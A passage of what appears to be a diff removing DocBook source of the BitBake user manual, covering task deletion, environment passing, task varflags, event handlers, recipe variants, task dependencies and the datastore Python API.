- defined in a recipe as shown in the following example:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>recipe</replaceable> -c listtasks
- </literallayout>
- For more information on task dependencies, see the
- "<link linkend='dependencies'>Dependencies</link>"
- section.
- </para>
-
- <para>
- See the
- "<link linkend='variable-flags'>Variable Flags</link>"
- section for information on variable flags you can use with
- tasks.
- </para>
- </section>
-
- <section id='deleting-a-task'>
- <title>Deleting a Task</title>
-
- <para>
- As well as being able to add tasks, you can delete them.
- Simply use the <filename>deltask</filename> command to
- delete a task.
- For example, to delete the example task used in the previous
- sections, you would use:
- <literallayout class='monospaced'>
- deltask printdate
- </literallayout>
- If you delete a task using the <filename>deltask</filename>
- command and the task has dependencies, the dependencies are
- not reconnected.
- For example, suppose you have three tasks named
- <filename>do_a</filename>, <filename>do_b</filename>, and
- <filename>do_c</filename>.
- Furthermore, <filename>do_c</filename> is dependent on
- <filename>do_b</filename>, which in turn is dependent on
- <filename>do_a</filename>.
- Given this scenario, if you use <filename>deltask</filename>
- to delete <filename>do_b</filename>, the implicit dependency
- relationship between <filename>do_c</filename> and
- <filename>do_a</filename> through <filename>do_b</filename>
- no longer exists, and <filename>do_c</filename> dependencies
- are not updated to include <filename>do_a</filename>.
- Thus, <filename>do_c</filename> is free to run before
- <filename>do_a</filename>.
- </para>
-
- <para>
- If you want dependencies such as these to remain intact, use
- the <filename>[noexec]</filename> varflag to disable the task
- instead of using the <filename>deltask</filename> command to
- delete it:
- <literallayout class='monospaced'>
- do_b[noexec] = "1"
- </literallayout>
- </para>
- </section>
-
- <section id='passing-information-into-the-build-task-environment'>
- <title>Passing Information Into the Build Task Environment</title>
-
- <para>
- When running a task, BitBake tightly controls the shell execution
- environment of the build tasks to make
- sure unwanted contamination from the build machine cannot
- influence the build.
- <note>
- By default, BitBake cleans the environment to include only those
- things exported or listed in its whitelist to ensure that the build
- environment is reproducible and consistent.
- You can prevent this "cleaning" by setting the
- <link linkend='var-bb-BB_PRESERVE_ENV'><filename>BB_PRESERVE_ENV</filename></link>
- variable.
- </note>
- Consequently, if you do want something to get passed into the
- build task environment, you must take these two steps:
- <orderedlist>
- <listitem><para>
- Tell BitBake to load what you want from the environment
- into the datastore.
- You can do so through the
- <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>
- and
- <link linkend='var-bb-BB_ENV_EXTRAWHITE'><filename>BB_ENV_EXTRAWHITE</filename></link>
- variables.
- For example, assume you want to prevent the build system from
- accessing your <filename>$HOME/.ccache</filename>
- directory.
- The following command "whitelists" the environment variable
- <filename>CCACHE_DIR</filename> causing BitBake to allow that
- variable into the datastore:
- <literallayout class='monospaced'>
- export BB_ENV_EXTRAWHITE="$BB_ENV_EXTRAWHITE CCACHE_DIR"
- </literallayout></para></listitem>
- <listitem><para>
- Tell BitBake to export what you have loaded into the
- datastore to the task environment of every running task.
- Loading something from the environment into the datastore
- (previous step) only makes it available in the datastore.
- To export it to the task environment of every running task,
- use a command similar to the following in your local configuration
- file <filename>local.conf</filename> or your
- distribution configuration file:
- <literallayout class='monospaced'>
- export CCACHE_DIR
- </literallayout>
- <note>
- A side effect of the previous steps is that BitBake
- records the variable as a dependency of the build process
- in things like the setscene checksums.
- If doing so results in unnecessary rebuilds of tasks, you can
- whitelist the variable so that the setscene code
- ignores the dependency when it creates checksums.
- </note></para></listitem>
- </orderedlist>
- </para>
-
- <para>
- Sometimes, it is useful to be able to obtain information
- from the original execution environment.
- BitBake saves a copy of the original environment into
- a special variable named
- <link linkend='var-bb-BB_ORIGENV'><filename>BB_ORIGENV</filename></link>.
- </para>
-
- <para>
- The <filename>BB_ORIGENV</filename> variable returns a datastore
- object that can be queried using the standard datastore operators
- such as <filename>getVar(, False)</filename>.
- The datastore object is useful, for example, to find the original
- <filename>DISPLAY</filename> variable.
- Here is an example:
- <literallayout class='monospaced'>
- origenv = d.getVar("BB_ORIGENV", False)
- bar = origenv.getVar("BAR", False)
- </literallayout>
- The previous example returns <filename>BAR</filename> from the original
- execution environment.
- </para>
- </section>
- </section>
-
- <section id='variable-flags'>
- <title>Variable Flags</title>
-
- <para>
- Variable flags (varflags) help control a task's functionality
- and dependencies.
- BitBake reads and writes varflags to the datastore using the following
- command forms:
- <literallayout class='monospaced'>
- <replaceable>variable</replaceable> = d.getVarFlags("<replaceable>variable</replaceable>")
- self.d.setVarFlags("FOO", {"func": True})
- </literallayout>
- </para>
-
- <para>
- When working with varflags, the same syntax, with the exception of
- overrides, applies.
- In other words, you can set, append, and prepend varflags just like
- variables.
- See the
- "<link linkend='variable-flag-syntax'>Variable Flag Syntax</link>"
- section for details.
- </para>
-
- <para>
- BitBake has a defined set of varflags available for recipes and
- classes.
- Tasks support a number of these flags which control various
- functionality of the task:
- <itemizedlist>
- <listitem><para><emphasis><filename>[cleandirs]</filename>:</emphasis>
- Empty directories that should be created before the
- task runs.
- Directories that already exist are removed and recreated
- to empty them.
- </para></listitem>
- <listitem><para><emphasis><filename>[depends]</filename>:</emphasis>
- Controls inter-task dependencies.
- See the
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
- variable and the
- "<link linkend='inter-task-dependencies'>Inter-Task Dependencies</link>"
- section for more information.
- </para></listitem>
- <listitem><para><emphasis><filename>[deptask]</filename>:</emphasis>
- Controls task build-time dependencies.
- See the
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
- variable and the
- "<link linkend='build-dependencies'>Build Dependencies</link>"
- section for more information.
- </para></listitem>
- <listitem><para><emphasis><filename>[dirs]</filename>:</emphasis>
- Directories that should be created before the task runs.
- Directories that already exist are left as is.
- The last directory listed is used as the
- current working directory for the task.
- </para></listitem>
- <listitem><para><emphasis><filename>[lockfiles]</filename>:</emphasis>
- Specifies one or more lockfiles to lock while the task
- executes.
- Only one task may hold a lockfile, and any task that
- attempts to lock an already locked file will block until
- the lock is released.
- You can use this variable flag to accomplish mutual
- exclusion.
- </para></listitem>
- <listitem><para><emphasis><filename>[noexec]</filename>:</emphasis>
- When set to "1", marks the task as being empty, with
- no execution required.
- You can use the <filename>[noexec]</filename> flag to set up
- tasks as dependency placeholders, or to disable tasks defined
- elsewhere that are not needed in a particular recipe.
- </para></listitem>
- <listitem><para><emphasis><filename>[nostamp]</filename>:</emphasis>
- When set to "1", tells BitBake to not generate a stamp
- file for a task, which implies the task should always
- be executed.
- <note><title>Caution</title>
- Any task that depends (possibly indirectly) on a
- <filename>[nostamp]</filename> task will always be
- executed as well.
- This can cause unnecessary rebuilding if you are
- not careful.
- </note>
- </para></listitem>
- <listitem><para><emphasis><filename>[number_threads]</filename>:</emphasis>
- Limits tasks to a specific number of simultaneous threads
- during execution.
- This varflag is useful when your build host has a large number
- of cores but certain tasks need to be rate-limited due to various
- kinds of resource constraints (e.g. to avoid network throttling).
- <filename>number_threads</filename> works similarly to the
- <link linkend='var-bb-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename></link>
- variable but is task-specific.</para>
-
- <para>Set the value globally.
- For example, the following makes sure the
- <filename>do_fetch</filename> task uses no more than two
- simultaneous execution threads:
- <literallayout class='monospaced'>
- do_fetch[number_threads] = "2"
- </literallayout>
- <note><title>Warnings</title>
- <itemizedlist>
- <listitem><para>
- Setting the varflag in individual recipes rather
- than globally can result in unpredictable behavior.
- </para></listitem>
- <listitem><para>
- Setting the varflag to a value greater than the
- value used in the <filename>BB_NUMBER_THREADS</filename>
- variable causes <filename>number_threads</filename>
- to have no effect.
- </para></listitem>
- </itemizedlist>
- </note>
- </para></listitem>
- <listitem><para><emphasis><filename>[postfuncs]</filename>:</emphasis>
- List of functions to call after the completion of the task.
- </para></listitem>
- <listitem><para><emphasis><filename>[prefuncs]</filename>:</emphasis>
- List of functions to call before the task executes.
- </para></listitem>
- <listitem><para><emphasis><filename>[rdepends]</filename>:</emphasis>
- Controls inter-task runtime dependencies.
- See the
- <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable, the
- <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- variable, and the
- "<link linkend='inter-task-dependencies'>Inter-Task Dependencies</link>"
- section for more information.
- </para></listitem>
- <listitem><para><emphasis><filename>[rdeptask]</filename>:</emphasis>
- Controls task runtime dependencies.
- See the
- <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable, the
- <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- variable, and the
- "<link linkend='runtime-dependencies'>Runtime Dependencies</link>"
- section for more information.
- </para></listitem>
- <listitem><para><emphasis><filename>[recideptask]</filename>:</emphasis>
- When set in conjunction with
- <filename>recrdeptask</filename>, specifies a task that
- should be inspected for additional dependencies.
- </para></listitem>
- <listitem><para><emphasis><filename>[recrdeptask]</filename>:</emphasis>
- Controls task recursive runtime dependencies.
- See the
- <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable, the
- <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- variable, and the
- "<link linkend='recursive-dependencies'>Recursive Dependencies</link>"
- section for more information.
- </para></listitem>
- <listitem><para><emphasis><filename>[stamp-extra-info]</filename>:</emphasis>
- Extra stamp information to append to the task's stamp.
- As an example, OpenEmbedded uses this flag to allow
- machine-specific tasks.
- </para></listitem>
- <listitem><para><emphasis><filename>[umask]</filename>:</emphasis>
- The umask to run the task under.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Several varflags are useful for controlling how signatures are
- calculated for variables.
- For more information on this process, see the
- "<link linkend='checksums'>Checksums (Signatures)</link>"
- section.
- <itemizedlist>
- <listitem><para><emphasis><filename>[vardeps]</filename>:</emphasis>
- Specifies a space-separated list of additional
- variables to add to a variable's dependencies
- for the purposes of calculating its signature.
- Adding variables to this list is useful, for example, when
- a function refers to a variable in a manner that
- does not allow BitBake to automatically determine
- that the variable is referred to.
- </para></listitem>
- <listitem><para><emphasis><filename>[vardepsexclude]</filename>:</emphasis>
- Specifies a space-separated list of variables
- that should be excluded from a variable's dependencies
- for the purposes of calculating its signature.
- </para></listitem>
- <listitem><para><emphasis><filename>[vardepvalue]</filename>:</emphasis>
- If set, instructs BitBake to ignore the actual
- value of the variable and instead use the specified
- value when calculating the variable's signature.
- </para></listitem>
- <listitem><para><emphasis><filename>[vardepvalueexclude]</filename>:</emphasis>
- Specifies a pipe-separated list of strings to exclude
- from the variable's value when calculating the
- variable's signature.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='events'>
- <title>Events</title>
-
- <para>
- BitBake allows installation of event handlers within recipe
- and class files.
- Events are triggered at certain points during operation, such
- as the beginning of operation against a given recipe
- (i.e. <filename>*.bb</filename>), the start of a given task,
- a task failure, a task success, and so forth.
- The intent is to make it easy to do things like email
- notification on build failures.
- </para>
-
- <para>
- Following is an example event handler that prints the name
- of the event and the content of the
- <filename>FILE</filename> variable:
- <literallayout class='monospaced'>
- addhandler myclass_eventhandler
- python myclass_eventhandler() {
- from bb.event import getName
- print("The name of the Event is %s" % getName(e))
- print("The file we run for is %s" % d.getVar('FILE'))
- }
- myclass_eventhandler[eventmask] = "bb.event.BuildStarted bb.event.BuildCompleted"
- </literallayout>
- In the previous example, an eventmask has been set so that
- the handler only sees the "BuildStarted" and "BuildCompleted"
- events.
- This event handler gets called every time an event matching
- the eventmask is triggered.
- A global variable "e" is defined, which represents the current
- event.
- With the <filename>getName(e)</filename> method, you can get
- the name of the triggered event.
- The global datastore is available as "d".
- In legacy code, you might see "e.data" used to get the datastore.
- However, realize that "e.data" is deprecated and you should use
- "d" going forward.
- </para>
-
- <para>
- The context of the datastore is appropriate to the event
- in question.
- For example, "BuildStarted" and "BuildCompleted" events run
- before any tasks are executed so would be in the global
- configuration datastore namespace.
- No recipe-specific metadata exists in that namespace.
- The "BuildStarted" and "BuildCompleted" events also run in
- the main cooker/server process rather than any worker context.
- Thus, any changes made to the datastore would be seen by other
- cooker/server events within the current build but not seen
- outside of that build or in any worker context.
- Task events run in the actual tasks in question consequently
- have recipe-specific and task-specific contents.
- These events run in the worker context and are discarded at
- the end of task execution.
- </para>
-
- <para>
- During a standard build, the following common events might
- occur.
- The following events are the most common kinds of events that
- most metadata might have an interest in viewing:
- <itemizedlist>
- <listitem><para>
- <filename>bb.event.ConfigParsed()</filename>:
- Fired when the base configuration; which consists of
- <filename>bitbake.conf</filename>,
- <filename>base.bbclass</filename> and any global
- <filename>INHERIT</filename> statements; has been parsed.
- You can see multiple such events when each of the
- workers parse the base configuration or if the server
- changes configuration and reparses.
- Any given datastore only has one such event executed
- against it, however.
- If
- <link linkende='var-bb-BB_INVALIDCONF'><filename>BB_INVALIDCONF</filename></link>
- is set in the datastore by the event handler, the
- configuration is reparsed and a new event triggered,
- allowing the metadata to update configuration.
- </para></listitem>
- <listitem><para>
- <filename>bb.event.HeartbeatEvent()</filename>:
- Fires at regular time intervals of one second.
- You can configure the interval time using the
- <filename>BB_HEARTBEAT_EVENT</filename> variable.
- The event's "time" attribute is the
- <filename>time.time()</filename> value when the
- event is triggered.
- This event is useful for activities such as
- system state monitoring.
- </para></listitem>
- <listitem><para>
- <filename>bb.event.ParseStarted()</filename>:
- Fired when BitBake is about to start parsing recipes.
- This event's "total" attribute represents the number of
- recipes BitBake plans to parse.
- </para></listitem>
- <listitem><para>
- <filename>bb.event.ParseProgress()</filename>:
- Fired as parsing progresses.
- This event's "current" attribute is the number of
- recipes parsed as well as the "total" attribute.
- </para></listitem>
- <listitem><para>
- <filename>bb.event.ParseCompleted()</filename>:
- Fired when parsing is complete.
- This event's "cached", "parsed", "skipped", "virtuals",
- "masked", and "errors" attributes provide statistics
- for the parsing results.
- </para></listitem>
- <listitem><para>
- <filename>bb.event.BuildStarted()</filename>:
- Fired when a new build starts.
- BitBake fires multiple "BuildStarted" events (one per configuration)
- when multiple configuration (multiconfig) is enabled.
- </para></listitem>
- <listitem><para>
- <filename>bb.build.TaskStarted()</filename>:
- Fired when a task starts.
- This event's "taskfile" attribute points to the recipe
- from which the task originates.
- The "taskname" attribute, which is the task's name,
- includes the <filename>do_</filename> prefix, and the
- "logfile" attribute point to where the task's output is
- stored.
- Finally, the "time" attribute is the task's execution start
- time.
- </para></listitem>
- <listitem><para>
- <filename>bb.build.TaskInvalid()</filename>:
- Fired if BitBake tries to execute a task that does not exist.
- </para></listitem>
- <listitem><para>
- <filename>bb.build.TaskFailedSilent()</filename>:
- Fired for setscene tasks that fail and should not be
- presented to the user verbosely.
- </para></listitem>
- <listitem><para>
- <filename>bb.build.TaskFailed()</filename>:
- Fired for normal tasks that fail.
- </para></listitem>
- <listitem><para>
- <filename>bb.build.TaskSucceeded()</filename>:
- Fired when a task successfully completes.
- </para></listitem>
- <listitem><para>
- <filename>bb.event.BuildCompleted()</filename>:
- Fired when a build finishes.
- </para></listitem>
- <listitem><para>
- <filename>bb.cooker.CookerExit()</filename>:
- Fired when the BitBake server/cooker shuts down.
- This event is usually only seen by the UIs as a
- sign they should also shutdown.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- This next list of example events occur based on specific
- requests to the server.
- These events are often used to communicate larger pieces of
- information from the BitBake server to other parts of
- BitBake such as user interfaces:
- <itemizedlist>
- <listitem><para>
- <filename>bb.event.TreeDataPreparationStarted()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.TreeDataPreparationProgress()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.TreeDataPreparationCompleted()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.DepTreeGenerated()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.CoreBaseFilesFound()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.ConfigFilePathFound()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.FilesMatchingFound()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.ConfigFilesFound()</filename>
- </para></listitem>
- <listitem><para>
- <filename>bb.event.TargetsTreeGenerated()</filename>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='variants-class-extension-mechanism'>
- <title>Variants - Class Extension Mechanism</title>
-
- <para>
- BitBake supports two features that facilitate creating
- from a single recipe file multiple incarnations of that
- recipe file where all incarnations are buildable.
- These features are enabled through the
- <link linkend='var-bb-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link>
- and
- <link linkend='var-bb-BBVERSIONS'><filename>BBVERSIONS</filename></link>
- variables.
- <note>
- The mechanism for this class extension is extremely
- specific to the implementation.
- Usually, the recipe's
- <link linkend='var-bb-PROVIDES'><filename>PROVIDES</filename></link>,
- <link linkend='var-bb-PN'><filename>PN</filename></link>, and
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
- variables would need to be modified by the extension class.
- For specific examples, see the OE-Core
- <filename>native</filename>, <filename>nativesdk</filename>,
- and <filename>multilib</filename> classes.
- </note>
- <itemizedlist>
- <listitem><para><emphasis><filename>BBCLASSEXTEND</filename>:</emphasis>
- This variable is a space separated list of classes used to "extend" the
- recipe for each variant.
- Here is an example that results in a second incarnation of the current
- recipe being available.
- This second incarnation will have the "native" class inherited.
- <literallayout class='monospaced'>
- BBCLASSEXTEND = "native"
- </literallayout></para></listitem>
- <listitem><para><emphasis><filename>BBVERSIONS</filename>:</emphasis>
- This variable allows a single recipe to build multiple versions of a
- project from a single recipe file.
- You can also specify conditional metadata
- (using the
- <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
- mechanism) for a single version, or an optionally named range of versions.
- Here is an example:
- <literallayout class='monospaced'>
- BBVERSIONS = "1.0 2.0 git"
- SRC_URI_git = "git://someurl/somepath.git"
-
- BBVERSIONS = "1.0.[0-6]:1.0.0+ \ 1.0.[7-9]:1.0.7+"
- SRC_URI_append_1.0.7+ = "file://some_patch_which_the_new_versions_need.patch;patch=1"
- </literallayout>
- The name of the range defaults to the original version of the
- recipe.
- For example, in OpenEmbedded, the recipe file
- <filename>foo_1.0.0+.bb</filename> creates a default name range
- of <filename>1.0.0+</filename>.
- This is useful because the range name is not only placed
- into overrides, but it is also made available for the metadata to use
- in the variable that defines the base recipe versions for use in
- <filename>file://</filename> search paths
- (<link linkend='var-bb-FILESPATH'><filename>FILESPATH</filename></link>).
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='dependencies'>
- <title>Dependencies</title>
-
- <para>
- To allow for efficient parallel processing, BitBake handles
- dependencies at the task level.
- Dependencies can exist both between tasks within a single recipe
- and between tasks in different recipes.
- Following are examples of each:
- <itemizedlist>
- <listitem><para>For tasks within a single recipe, a
- recipe's <filename>do_configure</filename>
- task might need to complete before its
- <filename>do_compile</filename> task can run.
- </para></listitem>
- <listitem><para>For tasks in different recipes, one
- recipe's <filename>do_configure</filename>
- task might require another recipe's
- <filename>do_populate_sysroot</filename>
- task to finish first such that the libraries and headers
- provided by the other recipe are available.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- This section describes several ways to declare dependencies.
- Remember, even though dependencies are declared in different ways, they
- are all simply dependencies between tasks.
- </para>
-
- <section id='dependencies-internal-to-the-bb-file'>
- <title>Dependencies Internal to the <filename>.bb</filename> File</title>
-
- <para>
- BitBake uses the <filename>addtask</filename> directive
- to manage dependencies that are internal to a given recipe
- file.
- You can use the <filename>addtask</filename> directive to
- indicate when a task is dependent on other tasks or when
- other tasks depend on that recipe.
- Here is an example:
- <literallayout class='monospaced'>
- addtask printdate after do_fetch before do_build
- </literallayout>
- In this example, the <filename>do_printdate</filename>
- task depends on the completion of the
- <filename>do_fetch</filename> task, and the
- <filename>do_build</filename> task depends on the
- completion of the <filename>do_printdate</filename>
- task.
- <note><para>
- For a task to run, it must be a direct or indirect
- dependency of some other task that is scheduled to
- run.</para>
-
- <para>For illustration, here are some examples:
- <itemizedlist>
- <listitem><para>
- The directive
- <filename>addtask mytask before do_configure</filename>
- causes <filename>do_mytask</filename> to run before
- <filename>do_configure</filename> runs.
- Be aware that <filename>do_mytask</filename> still only
- runs if its <link linkend='checksums'>input checksum</link>
- has changed since the last time it was run.
- Changes to the input checksum of
- <filename>do_mytask</filename> also indirectly cause
- <filename>do_configure</filename> to run.
- </para></listitem>
- <listitem><para>
- The directive
- <filename>addtask mytask after do_configure</filename>
- by itself never causes <filename>do_mytask</filename>
- to run.
- <filename>do_mytask</filename> can still be run manually
- as follows:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>recipe</replaceable> -c mytask
- </literallayout>
- Declaring <filename>do_mytask</filename> as a dependency
- of some other task that is scheduled to run also causes
- it to run.
- Regardless, the task runs after
- <filename>do_configure</filename>.
- </para></listitem>
- </itemizedlist></para>
- </note>
- </para>
- </section>
-
- <section id='build-dependencies'>
- <title>Build Dependencies</title>
-
- <para>
- BitBake uses the
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
- variable to manage build time dependencies.
- The <filename>[deptask]</filename> varflag for tasks
- signifies the task of each
- item listed in <filename>DEPENDS</filename> that must
- complete before that task can be executed.
- Here is an example:
- <literallayout class='monospaced'>
- do_configure[deptask] = "do_populate_sysroot"
- </literallayout>
- In this example, the <filename>do_populate_sysroot</filename>
- task of each item in <filename>DEPENDS</filename> must complete before
- <filename>do_configure</filename> can execute.
- </para>
- </section>
-
- <section id='runtime-dependencies'>
- <title>Runtime Dependencies</title>
-
- <para>
- BitBake uses the
- <link linkend='var-bb-PACKAGES'><filename>PACKAGES</filename></link>,
- <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>, and
- <link linkend='var-bb-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- variables to manage runtime dependencies.
- </para>
-
- <para>
- The <filename>PACKAGES</filename> variable lists runtime
- packages.
- Each of those packages can have <filename>RDEPENDS</filename> and
- <filename>RRECOMMENDS</filename> runtime dependencies.
- The <filename>[rdeptask]</filename> flag for tasks is used to
- signify the task of each
- item runtime dependency which must have completed before that
- task can be executed.
- <literallayout class='monospaced'>
- do_package_qa[rdeptask] = "do_packagedata"
- </literallayout>
- In the previous example, the <filename>do_packagedata</filename>
- task of each item in <filename>RDEPENDS</filename> must have
- completed before <filename>do_package_qa</filename> can execute.
- Although <filename>RDEPENDS</filename> contains entries from the
- runtime dependency namespace, BitBake knows how to map them back
- to the build-time dependency namespace, in which the tasks are defined.
- </para>
- </section>
-
- <section id='recursive-dependencies'>
- <title>Recursive Dependencies</title>
-
- <para>
- BitBake uses the <filename>[recrdeptask]</filename> flag to manage
- recursive task dependencies.
- BitBake looks through the build-time and runtime
- dependencies of the current recipe, looks through
- the task's inter-task
- dependencies, and then adds dependencies for the
- listed task.
- Once BitBake has accomplished this, it recursively works through
- the dependencies of those tasks.
- Iterative passes continue until all dependencies are discovered
- and added.
- </para>
-
- <para>
- The <filename>[recrdeptask]</filename> flag is most commonly
- used in high-level
- recipes that need to wait for some task to finish "globally".
- For example, <filename>image.bbclass</filename> has the following:
- <literallayout class='monospaced'>
- do_rootfs[recrdeptask] += "do_packagedata"
- </literallayout>
- This statement says that the <filename>do_packagedata</filename>
- task of the current recipe and all recipes reachable
- (by way of dependencies) from the
- image recipe must run before the <filename>do_rootfs</filename>
- task can run.
- </para>
-
- <para>
- BitBake allows a task to recursively depend on itself by
- referencing itself in the task list:
- <literallayout class='monospaced'>
- do_a[recrdeptask] = "do_a do_b"
- </literallayout>
- In the same way as before, this means that the <filename>do_a</filename>
- and <filename>do_b</filename> tasks of the current recipe and all
- recipes reachable (by way of dependencies) from the recipe
- must run before the <filename>do_a</filename> task can run. In this
- case BitBake will ignore the current recipe's <filename>do_a</filename>
- task circular dependency on itself.
- </para>
- </section>
-
- <section id='inter-task-dependencies'>
- <title>Inter-Task Dependencies</title>
-
- <para>
- BitBake uses the <filename>[depends]</filename>
- flag in a more generic form
- to manage inter-task dependencies.
- This more generic form allows for inter-dependency
- checks for specific tasks rather than checks for
- the data in <filename>DEPENDS</filename>.
- Here is an example:
- <literallayout class='monospaced'>
- do_patch[depends] = "quilt-native:do_populate_sysroot"
- </literallayout>
- In this example, the <filename>do_populate_sysroot</filename>
- task of the target <filename>quilt-native</filename>
- must have completed before the
- <filename>do_patch</filename> task can execute.
- </para>
-
- <para>
- The <filename>[rdepends]</filename> flag works in a similar
- way but takes targets
- in the runtime namespace instead of the build-time dependency
- namespace.
- </para>
- </section>
- </section>
-
- <section id='functions-you-can-call-from-within-python'>
- <title>Functions You Can Call From Within Python</title>
-
- <para>
- BitBake provides many functions you can call from
- within Python functions.
- This section lists the most commonly used functions,
- and mentions where to find others.
- </para>
-
- <section id='functions-for-accessing-datastore-variables'>
- <title>Functions for Accessing Datastore Variables</title>
-
- <para>
- It is often necessary to access variables in the
- BitBake datastore using Python functions.
- The BitBake datastore has an API that allows you this
- access.
- Here is a list of available operations:
- </para>
-
- <para>
- <informaltable frame='none'>
- <tgroup cols='2' align='left' colsep='1' rowsep='1'>
- <colspec colname='c1' colwidth='1*'/>
- <colspec colname='c2' colwidth='1*'/>
- <thead>
- <row>
- <entry align="left"><emphasis>Operation</emphasis></entry>
- <entry align="left"><emphasis>Description</emphasis></entry>
- </row>
- </thead>
- <tbody>
- <row>
- <entry align="left"><filename>d.getVar("X", expand)</filename></entry>
- <entry align="left">Returns the value of variable "X".
- Using "expand=True" expands the value.
- Returns "None" if the variable "X" does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.setVar("X", "value")</filename></entry>
- <entry align="left">Sets the variable "X" to "value".</entry>
- </row>
- <row>
- <entry align="left"><filename>d.appendVar("X", "value")</filename></entry>
- <entry align="left">Adds "value" to the end of the variable "X".
- Acts like <filename>d.setVar("X", "value")</filename>
- if the variable "X" does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.prependVar("X", "value")</filename></entry>
- <entry align="left">Adds "value" to the start of the variable "X".
- Acts like <filename>d.setVar("X", "value")</filename>
- if the variable "X" does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.delVar("X")</filename></entry>
- <entry align="left">Deletes the variable "X" from the datastore.
- Does nothing if the variable "X" does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.renameVar("X", "Y")</filename></entry>
- <entry align="left">Renames the variable "X" to "Y".
- Does nothing if the variable "X" does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.getVarFlag("X", flag, expand)</filename></entry>
- <entry align="left">Returns the value of variable "X".
- Using "expand=True" expands the value.
- Returns "None" if either the variable "X" or the named flag
- does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.setVarFlag("X", flag, "value")</filename></entry>
- <entry align="left">Sets the named flag for variable "X" to "value".</entry>
- </row>
- <row>
- <entry align="left"><filename>d.appendVarFlag("X", flag, "value")</filename></entry>
- <entry align="left">Appends "value" to the named flag on the
- variable "X".
- Acts like <filename>d.setVarFlag("X", flag, "value")</filename>
- if the named flag does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.prependVarFlag("X", flag, "value")</filename></entry>
- <entry align="left">Prepends "value" to the named flag on
- the variable "X".
- Acts like <filename>d.setVarFlag("X", flag, "value")</filename>
- if the named flag does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.delVarFlag("X", flag)</filename></entry>
- <entry align="left">Deletes the named flag on the variable
- "X" from the datastore.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.setVarFlags("X", flagsdict)</filename></entry>
- <entry align="left">Sets the flags specified in
- the <filename>flagsdict()</filename> parameter.
- <filename>setVarFlags</filename> does not clear previous flags.
- Think of this operation as <filename>addVarFlags</filename>.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.getVarFlags("X")</filename></entry>
- <entry align="left">Returns a <filename>flagsdict</filename>
- of the flags for the variable "X".
- Returns "None" if the variable "X" does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.delVarFlags("X")</filename></entry>
- <entry align="left">Deletes all the flags for the variable "X".
- Does nothing if the variable "X" does not exist.</entry>
- </row>
- <row>
- <entry align="left"><filename>d.expand(expression)</filename></entry>
- <entry align="left">Expands variable references in the specified
- string expression.
- References to variables that do not exist are left as is.
- For example, <filename>d.expand("foo ${X}")</filename>
- expands to the literal string "foo ${X}" if the
- variable "X" does not exist.</entry>
- </row>
- </tbody>
- </tgroup>
- </informaltable>
- </para>
- </section>
-
- <section id='other-functions'>
- <title>Other Functions</title>
-
- <para>
- You can find many other functions that can be called
- from Python by looking at the source code of the
- <filename>bb</filename> module, which is in
- <filename>bitbake/lib/bb</filename>.
- For example,
- <filename>bitbake/lib/bb/utils.py</filename> includes
- the commonly used functions
- <filename>bb.utils.contains()</filename> and
- <filename>bb.utils.mkdirhier()</filename>, which come
- with docstrings.
- </para>
- </section>
- </section>
-
- <section id='task-checksums-and-setscene'>
- <title>Task Checksums and Setscene</title>
-
- <para>
- BitBake uses checksums (or signatures) along with the setscene
- to determine if a task needs to be run.
- This section describes the process.
- To help understand how BitBake does this, the section assumes an
- OpenEmbedded metadata-based example.
- </para>
-
- <para>
- These checksums are stored in
- <link linkend='var-bb-STAMP'><filename>STAMP</filename></link>.
- You can examine the checksums using the following BitBake command:
- <literallayout class='monospaced'>
- $ bitbake-dumpsigs
- </literallayout>
- This command returns the signature data in a readable format
- that allows you to examine the inputs used when the
- OpenEmbedded build system generates signatures.
- For example, using <filename>bitbake-dumpsigs</filename>
- allows you to examine the <filename>do_compile</filename>
- task's “sigdata†for a C application (e.g.
- <filename>bash</filename>).
- Running the command also reveals that the “CC†variable is part of
- the inputs that are hashed.
- Any changes to this variable would invalidate the stamp and
- cause the <filename>do_compile</filename> task to run.
- </para>
-
- <para>
- The following list describes related variables:
- <itemizedlist>
- <listitem><para>
